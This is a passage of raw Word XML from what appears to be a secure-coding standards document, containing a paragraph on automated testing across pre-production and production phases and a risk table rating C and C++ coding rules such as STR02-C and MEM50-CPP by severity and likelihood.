          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000394">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95">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000396">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Most of the coding standards listed in this document will fall into the “pre-production” category, as they are integral to the design of the code rather than the maintenance of it.  Only standards STR02-C and ERR59-CPP would realistically be tested in depth during the “production” phase; all other standards should be completely tested in the “pre-production” phase.  However, with that said, realistically all standards should be tested via automation in both phases.  During pre-production, the automated tests should be done during the “Verify and Test” portion.  If there are errors detected, they should be addressed, and the pre-production cycle starts from the beginning.  However, if everything comes up clean and the code is ready to move onto production, automated tests should be put in place during the “Monitor and Detect” portion of the production cycle.  These tests should periodically test the code for potential vulnerabilities, especially from outside sources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000397">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000398">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399">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9A">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9B">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9C">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9D">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9E">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9F">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A0">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A1">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ARR02-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A2">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A3">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A4">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A5">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A6">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A7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">DCL00-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A8">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003A9">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AA">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AB">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AC">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AD">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">DCL03-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AE">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003AF">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B0">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B1">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B2">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B3">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">DCL04-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B4">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B5">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B6">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003B8">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9">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">DCL07-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003BA">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003BB">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003BC">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003BD">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003BE">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F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ERR59-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C0">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C1">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C2">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C3">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C4">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5">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">INT08-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C6">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C8">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003C9">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003CA">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="208.5546875" w:hRule="atLeast"/>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B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">MEM50-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003CC">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003CD">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003CE">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003CF">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D0">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D1">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">STD-001-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D2">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D3">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D4">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D5">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D6">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D7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">STR02-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D8">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003D9">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DA">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DB">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DC">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D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">STR50-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DE">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003DF">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E0">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E1">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003E2">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
